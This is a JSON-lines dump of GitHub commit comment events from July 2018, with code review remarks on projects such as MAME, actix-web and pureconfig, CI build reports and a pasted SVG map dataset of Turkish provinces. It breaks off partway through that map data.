{"id":"7953258395","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29678705,"position":43,"line":43,"path":"src/mame/drivers/cms.cpp","commit_id":"e7da0b3a4b75ba3327bd690ea94c9337ee4cf43b","created_at":"2018-07-12T00:19:54Z","updated_at":"2018-07-12T00:19:54Z","author_association":"MEMBER","body":"Please indent initialiser lists, as they're effectively in the scope of the function."}},"created_at":"2018-07-12T00:19:54Z"}
{"id":"7953262366","type":"CommitCommentEvent","actor":{"login":"pvint"},"repo":{"name":"pvint/fade9685"},"payload":{"comment":{"id":29678714,"position":null,"line":null,"path":null,"commit_id":"72163128dc0f93635e0863183e81fe2586f9698d","created_at":"2018-07-12T00:21:29Z","updated_at":"2018-07-12T00:21:29Z","author_association":"OWNER","body":"I love how I misspelled \"formatting\" in the commit message!"}},"created_at":"2018-07-12T00:21:29Z"}
{"id":"7953289681","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29678764,"position":null,"line":null,"path":null,"commit_id":"bb0e7e7914bc68bfb200259c42b751636cb6e972","created_at":"2018-07-12T00:32:18Z","updated_at":"2018-07-12T00:32:18Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-779](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-779).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-779-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-12T00:32:18Z"}
{"id":"7953292073","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29678767,"position":144,"line":144,"path":"src/devices/bus/acorn/bus.cpp","commit_id":"51fa9aa2e81400cfa4df380a751fe15e7b3d254e","created_at":"2018-07-12T00:33:13Z","updated_at":"2018-07-12T00:33:13Z","author_association":"MEMBER","body":"Please don't write device interfaces that require implementations to call magic member functions at the right time to work properly - it's too error-prone.  Override `interface_pre_start` and/or `interface_post_start` to deal with things like this.  See what I've been doing with `a2bus` etc."}},"created_at":"2018-07-12T00:33:13Z"}
{"id":"7953293109","type":"CommitCommentEvent","actor":{"login":"Rytech2"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29678768,"position":null,"line":null,"path":null,"commit_id":"eeb019231894b50694d2f58750cec660439c5d59","created_at":"2018-07-12T00:33:35Z","updated_at":"2018-07-12T00:33:35Z","author_association":"NONE","body":"Range is confirmed 4 but I found a set skill flag in the zone called DISTINCT_DAMAGE_FORMULA which forces a skill to deal ranged damage no matter the range. May wanna check on that."}},"created_at":"2018-07-12T00:33:35Z"}
{"id":"7953296029","type":"CommitCommentEvent","actor":{"login":"coder543"},"repo":{"name":"actix/actix-web"},"payload":{"comment":{"id":29678771,"position":41,"line":207,"path":"src/server/channel.rs","commit_id":"9aef34e768574d9af4eb33880652749419eba446","created_at":"2018-07-12T00:34:39Z","updated_at":"2018-07-12T00:34:39Z","author_association":"NONE","body":"If `next` is already `&mut`, couldn't this line just be\r\n\r\n```rust\r\nlet next: *mut Node<T> = next as *mut _;\r\n```\r\n\r\nI could be wrong."}},"created_at":"2018-07-12T00:34:39Z"}
{"id":"7953299192","type":"CommitCommentEvent","actor":{"login":"brodybits"},"repo":{"name":"rbiggs/superfine"},"payload":{"comment":{"id":29678777,"position":87,"line":131,"path":"src/index.js","commit_id":"ee500c77e861bfaa9b53e2ef8eb631c1c275d152","created_at":"2018-07-12T00:35:53Z","updated_at":"2018-07-12T00:35:53Z","author_association":"NONE","body":"I gotta say that I find this kind of inline cast to be a bit ugly, would probably move it to its own line as a workaround. I wonder if there may be any way to better declare the types above to avoid this kind of inline casting?"}},"created_at":"2018-07-12T00:35:53Z"}
{"id":"7953299364","type":"CommitCommentEvent","actor":{"login":"coder543"},"repo":{"name":"actix/actix-web"},"payload":{"comment":{"id":29678778,"position":41,"line":207,"path":"src/server/channel.rs","commit_id":"9aef34e768574d9af4eb33880652749419eba446","created_at":"2018-07-12T00:35:57Z","updated_at":"2018-07-12T00:35:57Z","author_association":"NONE","body":"actually, I see that it uses `Node<T>` and `Node<I>`, so that might make a difference."}},"created_at":"2018-07-12T00:35:57Z"}
{"id":"7953302378","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29678784,"position":110,"line":110,"path":"src/devices/bus/acorn/bus.h","commit_id":"51fa9aa2e81400cfa4df380a751fe15e7b3d254e","created_at":"2018-07-12T00:37:05Z","updated_at":"2018-07-12T00:37:05Z","author_association":"MEMBER","body":"Mixin constructors should really never be public.  Also, why do you have the `m_next` and `next()` used for the `simple_list` intrusive structure template in `src/lib/util` when you appear to be using a `std::forward_list` to manage your list of slots?"}},"created_at":"2018-07-12T00:37:05Z"}
{"id":"7953307917","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678796,"position":null,"line":null,"path":null,"commit_id":"70091875b188b6c001632d257fd30ccad8f68833","created_at":"2018-07-12T00:39:24Z","updated_at":"2018-07-12T00:39:24Z","author_association":"NONE","body":"BugFix-EMSAlphaAllocation (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2932 of 2933 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 622\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70091875b188b6c001632d257fd30ccad8f68833-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-12T00:39:24Z"}
{"id":"7953307985","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29678797,"position":null,"line":null,"path":null,"commit_id":"969e79d7c601cd1d2b66474ca1ea40ddc6ea293f","created_at":"2018-07-12T00:39:25Z","updated_at":"2018-07-12T00:39:25Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/performance-improvements-on-long-topics/30187/27\n"}},"created_at":"2018-07-12T00:39:25Z"}
{"id":"7953326283","type":"CommitCommentEvent","actor":{"login":"haykam821"},"repo":{"name":"haykam821/Nebula-Create-a-Game"},"payload":{"comment":{"id":29678821,"position":6,"line":6,"path":"index.html","commit_id":"a2e8c30aa89d8a0c271503725fedea7db8f5c093","created_at":"2018-07-12T00:46:58Z","updated_at":"2018-07-12T00:46:58Z","author_association":"OWNER","body":"We'll be using `index.js` for the script and `bundle.js` for the script after it's been browserified and minified."}},"created_at":"2018-07-12T00:46:58Z"}
{"id":"7953328061","type":"CommitCommentEvent","actor":{"login":"dpressel"},"repo":{"name":"blester125/baseline"},"payload":{"comment":{"id":29678823,"position":111,"line":567,"path":"python/baseline/pytorch/torchy.py","commit_id":"ca534dccce7fccb45e23a30f0866ddef54c0240b","created_at":"2018-07-12T00:47:44Z","updated_at":"2018-07-12T00:47:44Z","author_association":"NONE","body":"CRF?"}},"created_at":"2018-07-12T00:47:44Z"}
{"id":"7953328740","type":"CommitCommentEvent","actor":{"login":"aleos89"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29678824,"position":null,"line":null,"path":null,"commit_id":"eeb019231894b50694d2f58750cec660439c5d59","created_at":"2018-07-12T00:48:03Z","updated_at":"2018-07-12T00:48:03Z","author_association":"CONTRIBUTOR","body":"Interesting. Thanks for the tip!"}},"created_at":"2018-07-12T00:48:03Z"}
{"id":"7953328948","type":"CommitCommentEvent","actor":{"login":"dpressel"},"repo":{"name":"blester125/baseline"},"payload":{"comment":{"id":29678825,"position":216,"line":657,"path":"python/baseline/pytorch/torchy.py","commit_id":"ca534dccce7fccb45e23a30f0866ddef54c0240b","created_at":"2018-07-12T00:48:09Z","updated_at":"2018-07-12T00:48:09Z","author_association":"NONE","body":"CRF?"}},"created_at":"2018-07-12T00:48:09Z"}
{"id":"7953333382","type":"CommitCommentEvent","actor":{"login":"ruippeixotog"},"repo":{"name":"pureconfig/pureconfig"},"payload":{"comment":{"id":29678829,"position":19,"line":71,"path":"modules/yaml/src/main/scala/pureconfig/module/yaml/package.scala","commit_id":"68f76e3f3b75e97ed8bfe32d3cfe6a80eb83c1a7","created_at":"2018-07-12T00:50:00Z","updated_at":"2018-07-12T00:50:00Z","author_association":"MEMBER","body":"Hmm, I'm not sure I understand... The idea is to have `using` not handle exceptions at all, neither from `f(resource)` nor from `resource.close()`. Since we're always using the method like this:\r\n\r\n```scala\r\nhandleYamlErrors() {\r\n  using(openFile()) { ioReader =>\r\n    (...)\r\n  }\r\n}\r\n```\r\n\r\nAll exceptions in `using` will be caught by `handleYamlErrors`, including the ones thrown by `resource.close()`. Am I missing something?\r\n"}},"created_at":"2018-07-12T00:50:00Z"}
{"id":"7953341411","type":"CommitCommentEvent","actor":{"login":"smdharris"},"repo":{"name":"smdharris/UTSNuxtProto"},"payload":{"comment":{"id":29678839,"position":null,"line":null,"path":null,"commit_id":"b36217aca198562c7c4a22bee068e2970cf1a25d","created_at":"2018-07-12T00:53:21Z","updated_at":"2018-07-12T00:53:21Z","author_association":"OWNER","body":"created license"}},"created_at":"2018-07-12T00:53:21Z"}
{"id":"7953344017","type":"CommitCommentEvent","actor":{"login":"dndydon"},"repo":{"name":"mohitathwani/swift"},"payload":{"comment":{"id":29678843,"position":null,"line":null,"path":null,"commit_id":"50aaa136f02dd526ea2e2a106d839829d48a5d50","created_at":"2018-07-12T00:54:25Z","updated_at":"2018-07-12T00:54:25Z","author_association":"NONE","body":"Hi Mohit. Looking good for your PR. I enjoyed being with you at SwiftSummit when this was coming together. Are you planning any more refactor tools?  I'm interested in working on one just to get my first starter bug fix contribution.  Cheers!"}},"created_at":"2018-07-12T00:54:25Z"}
{"id":"7953346005","type":"CommitCommentEvent","actor":{"login":"bigman212"},"repo":{"name":"Themis404/create_competition"},"payload":{"comment":{"id":29678849,"position":null,"line":null,"path":null,"commit_id":"cd0caddd3ea448cd623ded70a9494b9713b3edde","created_at":"2018-07-12T00:55:12Z","updated_at":"2018-07-12T00:55:12Z","author_association":"COLLABORATOR","body":"А почему ты это сделала? Зачем? Коммит должен отражать \"Почему\" ты это сделала, и подробности \"как\", если это сложно."}},"created_at":"2018-07-12T00:55:12Z"}
{"id":"7953346199","type":"CommitCommentEvent","actor":{"login":"neilbrub"},"repo":{"name":"CGUC/grapp-server"},"payload":{"comment":{"id":29678850,"position":52,"line":222,"path":"models/Posts.js","commit_id":"a01875304fb0587d16244c0279f7105b3d9180eb","created_at":"2018-07-12T00:55:17Z","updated_at":"2018-07-12T00:55:17Z","author_association":"MEMBER","body":"@picklechips Wouldn't the `${user}` here be the subscribed user (ie themselves)? Would we not want `comment.author` instead in the body?"}},"created_at":"2018-07-12T00:55:17Z"}
{"id":"7953353178","type":"CommitCommentEvent","actor":{"login":"leifwickland"},"repo":{"name":"pureconfig/pureconfig"},"payload":{"comment":{"id":29678855,"position":19,"line":71,"path":"modules/yaml/src/main/scala/pureconfig/module/yaml/package.scala","commit_id":"68f76e3f3b75e97ed8bfe32d3cfe6a80eb83c1a7","created_at":"2018-07-12T00:58:10Z","updated_at":"2018-07-12T00:58:10Z","author_association":"COLLABORATOR","body":"I tend to think that if you are reading a file and have successfully gotten to the end of it and have successfully parsed it, then you don't really care that you couldn't close the stream. You'd rather have the successful parse result than an exception that you can't really do anything about.\r\n\r\nHowever, if you got an exception while trying to read the file, yes, please fail the parse in a well-structured way."}},"created_at":"2018-07-12T00:58:10Z"}
{"id":"7953353212","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29678856,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-12T00:58:11Z","updated_at":"2018-07-12T00:58:11Z","author_association":"CONTRIBUTOR","body":"It might be the weekend before get to I look at it.  The two things I'll suggest as a test are the current version of the n-t-roff User's Manual and the version I adapted to use the new features.  The source for the current version should produce the existing document exactly, and the adapted version should reproduce its PDF exactly (with one caveat, and that is that rhanglevel wasn't working at the time the PDF was made, so there might be a few line breaks that aren't quite the same).\n\nThe adapted User's Manual is troffdoc.pdf located in the reffort/typo-tests-documents repository; the source is in the \"source\" directory.  It requires the Termes fonts (the default fonts don't produce the same result)."}},"created_at":"2018-07-12T00:58:11Z"}
{"id":"7953368684","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29678890,"position":null,"line":null,"path":null,"commit_id":"5cf9b2c72a73603cc7ecbecdda539c8df03142e4","created_at":"2018-07-12T01:04:23Z","updated_at":"2018-07-12T01:04:23Z","author_association":"NONE","body":"develop (rraustad) - Win64-Windows-7-VisualStudio-14: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5cf9b2c72a73603cc7ecbecdda539c8df03142e4-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T01:04:23Z"}
{"id":"7953369309","type":"CommitCommentEvent","actor":{"login":"ruippeixotog"},"repo":{"name":"pureconfig/pureconfig"},"payload":{"comment":{"id":29678891,"position":19,"line":71,"path":"modules/yaml/src/main/scala/pureconfig/module/yaml/package.scala","commit_id":"68f76e3f3b75e97ed8bfe32d3cfe6a80eb83c1a7","created_at":"2018-07-12T01:04:38Z","updated_at":"2018-07-12T01:04:38Z","author_association":"MEMBER","body":"Oh, I get it now! It makes sense, I'll add a `Try` around `resource.close()`.\r\n"}},"created_at":"2018-07-12T01:04:38Z"}
{"id":"7953375042","type":"CommitCommentEvent","actor":{"login":"ruippeixotog"},"repo":{"name":"pureconfig/pureconfig"},"payload":{"comment":{"id":29678900,"position":19,"line":71,"path":"modules/yaml/src/main/scala/pureconfig/module/yaml/package.scala","commit_id":"68f76e3f3b75e97ed8bfe32d3cfe6a80eb83c1a7","created_at":"2018-07-12T01:07:02Z","updated_at":"2018-07-12T01:07:02Z","author_association":"MEMBER","body":"Done in 20c481dd7b92fbe726342b4260b43b18f0a41da2."}},"created_at":"2018-07-12T01:07:02Z"}
{"id":"7953378317","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29678908,"position":null,"line":null,"path":null,"commit_id":"b60f39de21c1563bc618efc17722f8a5bec1988c","created_at":"2018-07-12T01:08:20Z","updated_at":"2018-07-12T01:08:20Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-12T01:08:20Z"}
{"id":"7953378878","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29678909,"position":null,"line":null,"path":null,"commit_id":"9ab8eef2fdd00702d68492d32e5b4187b32ab31c","created_at":"2018-07-12T01:08:33Z","updated_at":"2018-07-12T01:08:33Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implementar a efetuação uma Compra e todas suas dependências](https://trello.com/c/lbATkDET/188-implementar-a-efetua%C3%A7%C3%A3o-uma-compra-e-todas-suas-depend%C3%AAncias)"}},"created_at":"2018-07-12T01:08:33Z"}
{"id":"7953379541","type":"CommitCommentEvent","actor":{"login":"mxgrey"},"repo":{"name":"a-price/universal_robot"},"payload":{"comment":{"id":29678911,"position":18,"line":48,"path":"ur_kinematics/include/ur_kinematics/ur_kin.h","commit_id":"d3819f13c9e0fbca181e3892f7fc7561791cbf25","created_at":"2018-07-12T01:08:50Z","updated_at":"2018-07-12T01:08:50Z","author_association":"NONE","body":"It's a good idea to broadcast this improvement to users, but I would recommend making this warning in order to maintain API compatibility. Since this `#define` wasn't a requirement before, we'll be breaking users' code by making it mandatory now.\r\n\r\nIf API-breaking changes are going to be made, I would suggest a much more significant change that allows all robots to be used in the same translation unit. (It's worth noting that the `ur_kin.h` header can still only be included once, so you can still only link to one robot model per translation unit, even with these fixes)."}},"created_at":"2018-07-12T01:08:50Z"}
{"id":"7953381920","type":"CommitCommentEvent","actor":{"login":"mucahit818"},"repo":{"name":"mucahit818/map"},"payload":{"comment":{"id":29678919,"position":null,"line":null,"path":null,"commit_id":"914ca1828167721984241cc6455ad5832cf67994","created_at":"2018-07-12T01:09:52Z","updated_at":"2018-07-12T01:09:52Z","author_association":"OWNER","body":"var simplemaps_countrymap_mapinfo={\r\n  map_name: \"country\",\r\n  state_bbox_array:{TUR3047:{y:286,x:923,x2:999,y2:349},TUR3045:{y:175,x:682,x2:777,y2:230},TUR2308:{y:175,x:749,x2:815,y2:249},TUR2267:{y:66,x:223,x2:277,y2:124},TUR2302:{y:70,x:702,x2:774,y2:111},TUR2273:{y:291,x:195,x2:276,y2:352},TUR2272:{y:195,x:210,x2:317,y2:297},TUR2271:{y:318,x:189,x2:365,y2:405},TUR2270:{y:7,x:373,x2:466,y2:87},TUR2277:{y:186,x:83,x2:177,y2:274},TUR2276:{y:152,x:157,x2:250,y2:234},TUR2275:{y:246,x:228,x2:312,y2:323},TUR2274:{y:251,x:152,x2:229,y2:352},TUR3048:{y:186,x:888,x2:981,y2:299},TUR2240:{y:9,x:20,x2:66,y2:105},TUR2301:{y:57,x:767,x2:821,y2:109},TUR2278:{y:309,x:83,x2:211,y2:392},TUR2239:{y:97,x:1,x2:101,y2:183},TUR2238:{y:101,x:50,x2:173,y2:211},TUR3021:{y:214,x:397,x2:461,y2:285},TUR3020:{y:254,x:444,x2:501,y2:323},TUR2310:{y:181,x:809,x2:886,y2:245},TUR2311:{y:207,x:828,x2:913,y2:284},TUR3026:{y:130,x:438,x2:551,y2:213},TUR2291:{y:56,x:434,x2:512,y2:153},TUR2290:{y:72,x:489,x2:566,y2:133},TUR2293:{y:67,x:576,x2:652,y2:124},TUR2292:{y:73,x:647,x2:704,y2:143},TUR2295:{y:111,x:530,x2:684,y2:242},TUR2294:{y:1,x:443,x2:514,y2:64},TUR2297:{y:84,x:514,x2:625,y2:151},TUR2296:{y:26,x:482,x2:600,y2:88},TUR2299:{y:83,x:761,x2:882,y2:203},TUR2298:{y:42,x:807,x2:881,y2:108},TUR5520:{y:38,x:339,x2:389,y2:92},TUR5521:{y:18,x:338,x2:377,y2:55},TUR2287:{y:191,x:483,x2:589,y2:297},TUR2230:{y:183,x:31,x2:152,y2:288},TUR3041:{y:296,x:748,x2:848,y2:351},TUR2229:{y:274,x:71,x2:170,y2:324},TUR4840:{y:139,x:921,x2:999,y2:172},TUR2286:{y:158,x:411,x2:474,y2:224},TUR2263:{y:110,x:209,x2:266,y2:173},TUR2264:{y:104,x:128,x2:224,y2:177},TUR2265:{y:40,x:131,x2:221,y2:89},TUR2266:{y:63,x:188,x2:253,y2:109},TUR3031:{y:92,x:688,x2:742,y2:154},TUR2242:{y:44,x:56,x2:133,y2:108},TUR2269:{y:135,x:234,x2:334,y2:208},TUR4839:{y:37,x:867,x2:928,y2:105},TUR2241:{y:1,x:59,x2:133,y2:59},TUR3044:{y:296,x:836,x2:926,y2:339},TUR2284:{y:204,x:604,x2:704,y2:292},TUR3019:{y:123,x:398,x2:441,y2:196},TUR3043:{y:266,x:822,x2:906,y2:305},TUR2285:{y:320,x:361,x2:492,y2:410},TUR2268:{y:75,x:258,x2:359,y2:137},TUR3009:{y:71,x:358,x2:443,y2:128},TUR2309:{y:231,x:702,x2:823,y2:322},TUR3042:{y:244,x:802,x2:843,y2:312},TUR2307:{y:147,x:867,x2:981,y2:214},TUR3018:{y:249,x:477,x2:566,y2:376},TUR3016:{y:311,x:563,x2:646,y2:368},TUR3017:{y:278,x:636,x2:762,y2:369},TUR3010:{y:36,x:297,x2:347,y2:76},TUR3011:{y:199,x:292,x2:462,y2:368},TUR3012:{y:304,x:355,x2:443,y2:384},TUR2300:{y:141,x:662,x2:784,y2:212},TUR3032:{y:104,x:739,x2:790,y2:145},TUR3014:{y:222,x:167,x2:221,y2:267},TUR3040:{y:70,x:861,x2:943,y2:152},TUR3008:{y:98,x:272,x2:432,y2:238},TUR2288:{y:187,x:446,x2:492,y2:257},TUR2289:{y:345,x:529,x2:575,y2:423},TUR4841:{y:345,x:574,x2:619,y2:371},TUR4842:{y:302,x:537,x2:578,y2:349},TUR5519:{y:67,x:272,x2:321,y2:100},TUR5518:{y:98,x:163,x2:197,y2:115},TUR2282:{y:198,x:662,x2:769,y2:259},TUR2283:{y:239,x:551,x2:633,y2:331},TUR2281:{y:265,x:614,x2:710,y2:319}},\r\n\tpaths: {\r\n    TUR3042: \"M835.8 266l-2.3 2.7-1.1 3.6-2.6 3-6 1.7-1.7 3 0.4 4.3 5.6 5.2 9.5 3.9 5.5 6.2-9.6 6.9-5.8 4.3-8 1.6-5.6-3.5-3.7-7.6-3.6-4.7-1-0.5-1.3 0.1-1.2-2-0.4-2.5-0.5-1.9 0.5-1.6 2.5-1.8 2.1-2.4 2.4-8 1-1.4 0.8-1.6 0.4-3.7-0.7-7.2 0.6-3.9 1.1-3.6 0.4-2.4 1.2-1.7 2.7-1.3 1.7-0.5 1.7-0.2 2-1.1-0.3-2.3 2.8-0.9 2.9-0.4 4.5 1.7 1.8 9 1.2 3.6 0.2 2.4 0 2.5-0.2 1.5 0.1 1.5z\",\r\n    TUR3017: \"M748.4 321.8l0.7 7.8 1.5 1.6 1.7 1.4 2.6 2.7 0.7 1.4-0.6 5.2 4.8 8.4 2.2 1.2-3.7 2.5-1.9 0.9-2 0.4-1.9 0.6-5.2 3.1-11.1 4.3-27.4 5.2-2.8 0.1-8.1-2.7-2.7 0.2-1.1 0.4-8.5 0.4-3.7-0.5-3.1-1.7-7.1-7.4-2.5-1.4-9.9-3-3.5-0.5-1.8 0.2-3.5 1.4-5 3.2-0.3-0.6-0.1-0.9 0.1-0.8 0.5-0.4 0.6-0.2-0.3-0.6-0.9-1-0.3-1.3 0-1.6-0.2-0.5-1.4-1.3-0.8-0.9-0.1-0.6 0-1 0.6-1.6 0.1-0.7-0.6-0.3-0.6 0.1-1.3 0.6-0.4 0.1-0.5-0.3-0.5-0.6-0.5-0.3-0.6 0.4-0.7-0.7 0-0.8 0.3-1.9 0.1-1.6-0.1-0.6-0.3-0.8-0.9-1.4-0.4-0.9-0.2-1 0.2-1.1 0.4-0.5 0.5 0.1 0.4 0.8 0.3 0 0-1.4-0.4-1-0.6-0.7-0.8-0.5 0.6-2.4 0.3-0.5 1.1-0.9 0.4-1.6 0.5-0.9 1.8-1.8 2.3-2.9 0.8-0.6 0.9 0 0.8 0.1 0.9-0.2 0.8 0.6 0.6 0 1.5-1.1 0.7 0.8 0.9 0.5 2.3 0.6 0.3 0.1 0 0.6 0.5 0.1 0.6-0.7 0.1-1.6 0.4-0.4 2.3 0.3 0.8-0.3 0.3-1.5 0.6 0 3-1.2 1.6 0.7 6.4-1.1 1.1-0.7 3.1-3.3 0.7-1.2 0.5-0.2 2.5-2.7 11.6-1.8-2.6-2-0.9-1 1-0.7 0.8 0.8 0.7 0.1 0.8-0.4 0.6-0.7 0.3-0.3 0.9 0.6 0.5 0 0.8-0.5-1.4-1.5-0.4-0.3 0.7-0.8 1-0.2 1.2-0.1 1-0.3-0.6-0.9 0.1-1.7-0.6-0.5-0.6 0.1-1.5 1-0.7 0.2 0.4-1 0.6-0.8 0.7-0.6 0.8-0.3 0.4 0.1 1.4 0.4 0.3-0.5 0.1-0.6-0.4-0.8 0.6-0.9 0.3-0.9 0-0.8-0.6-1 2.6-0.8 0.7-0.5 0.5-1 0.3-2.2 0.2-0.9 0.6-0.8 0.9-0.5 3.2-0.9 2-1.5 4.1 2.2 4.2 0.7 3.1 0.1 2.9 1.4 3.2 3.3 3.4 2.9 1.6 0.8 1.7 0.6 2 1.8 2.5 1.1 1-1.6 1.5 0.6 1.3 1.3 1 0.5 0.9 0.3 0.8 1.6-0.4 7.1 0.8 5 0.5 1.9 0.2 1 1.8 5.3 1.8 3.4 2.4 2.7z\",\r\n    TUR3045: \"M777.3 176.9l-2 2.5-2.6 1.2-1.4-0.1-2.4-0.4-0.9 0.7-1.4 3-2.5 1.8-2.5-0.1-2.4 1-0.4 1.3-0.5 1.1-0.7 0.3-3.7-0.2-2.6 0.8-0.7 1.4-0.3 3.3-0.6 1.7-0.3 1.8 1.1 5.1-0.4 2.2-0.9 2.1-2.8 0.2-2.6 0.6-1 0.7-0.7 1.1 0.6 2.6 0.2 2.3-0.7 3.2-1.4 2.8-3.2 3.6-4.9 1.9-5 0.3-1.9-0.1-1.8 0.4-1.3 1.7-1.6 1.1-1.3-0.4-1.3-0.6-1.3 0.3-1.2-1.5-1-0.7-2.3-0.7-2.3-1.6-2.4-1.1-2.1-0.2-2.1-0.7-1.7-0.1-1.6-1-0.5 0-1.6 0.3-2.2-1-4.1 0.3-4.1 1.1-1.5 0-2.2-2.2 0-1.9 0.8-1.7-0.1-2-2-3-0.4-4.2-0.9-0.7-0.2-1.6 0.2-1.6 1.8-1 0.8-3.8 1.2-0.7 1.4-0.3 1.4-0.9-0.7-1.3-0.7-2 0.9-2.2 3.1-1.1 0.6-0.3 0.6-1.2 0.7-1.1 1.5 0.1 1.3-0.7 1-1.8 1.4-1.1 5.2-2 2.7-0.5 2.7 0.5 2.2-0.6 2.1-1.1 4 0.3 4 0.9 4.1 0 8-1.2 3.6-1.2 2.4-3 1.9-0.6 2.8 1.6 4.1 1 4.8-1.6 1.1-0.2 2-0.9 1.7-0.6 0.1-0.2 0.6 0.1 2 0.7 1 0.6 7.7 0.2 4.3 0.7 4.2 0.1z\",\r\n    TUR2242: \"M131.9 72l-0.5-0.2-2.5 0.9-0.3 0.3-0.6 0-2.8 1.2-0.8 0.2-0.9 0.4-0.8 0.6-0.6 0.6-1.1 1.9-0.4 0.9 0.1 0.6-0.9 0.2-4.2-0.5-0.8-0.5-0.8-0.6-0.8-0.5-2.1-0.6-1.9-0.1-11.2 1.6-1.6 1-1.1 2.3-1.3 5.5-1.2 2.1-4.9 4.8-2.2 4-4.7 3.5-1 1.4-0.6 0.2-1.3 0.1-1.4 1-2.4-0.1-1.1 0.2-0.9 0.7-1.5 2.2-0.6 0.4-1.4 0.2-1.7-5.1 0.1-5.5-7.6-0.7-1.4-4.5-2-4.4-0.3-5.6 0.9-4.8 1.6-4.2 2.6-3.3 0.8-4.1-0.4-9.7-0.6-1.3 7.8-1.7 8.5-0.7 6.1 0 2.9 2 2.3 3.1 2.9 1.9 3.3-0.9 3.1-2.3 1.9-3.9 2.4-3.7 5.1-1.5 5.7-1.4 9-1.1 9.1-1 1.4 4.9 0.6 4.6-1.6 5.7-0.7 4.2 0.7 5.3 0.6 3.8z\",\r\n    TUR3026: \"M514.3 133.4l3.6 4.1 4.1 2.9 4.9-0.4 4.1 0.8 2.4-0.2 2.4-0.5 2.2-1 2.2-0.6 2.2 2.2-0.4 3.8-0.1 2.6 1 2 1 0.9 0.6 1.5 1.5 5 2.5 4.5 1.8 1 0.5 1.4 0.2 1.6-1.6 5.6-3.8 3.8-4.5 3.5-1.8 2.2-1.6 2.5-1.2 2.5-1.7 2.2-2.4 1.8-1.9 2.3-4.4 6.1-16.9 11-2.3 0.8-5.9 3.8-11.8-1.9-0.7-1.7-0.8-1.6-0.4-1.4-0.2-1.6 0.4-1.6-1.1-2-4.2-2.6-0.7-2.7-1-2-1.7-0.9-1.3-1.6-0.5-1.3-0.2-1.5-0.4-0.8-1.5-0.7-0.9-0.2-1.3-3.2-2.3-1.9-2.6-0.5-2.3-1.5-7.2-8.9-0.6-1.4-0.5-1.5-1-1.5-4.1 0-2.4-0.8-2.6-3-2.7-2.6-2.9 0-1-1-1.1-1-0.5-1.4 0.2-1.4-0.3-1.5-0.5-1.3 3-1.4 8.2-1 4.9-2.3 5.1-1.7 8 1.5 3.1-1.2 2.1 0.2 4.2-0.3 7.8-3.8 4.4 1.3 2.4-0.3 4.1-2.4 1.4-1.9 0.1-1.3 0.6-1.5 0.2-1.2-0.7-0.8 0.5-3 5-0.4 2.1-0.8 0.5 0.2 0.4 1.4 1 0.7 2.3 0.2 2.7-0.2 2.6 0.8z\",\r\n    TUR3031: \"M739.7 107.9l1.8 10.1-0.4 10.1-1.7 3.9-0.6 2.2-0.2 2.3 1.1 4.6 1.9 4.2-2 3-2.3 2.4-5.8 1.4-2.8 1.4-3 0.3-3.1-0.2-3 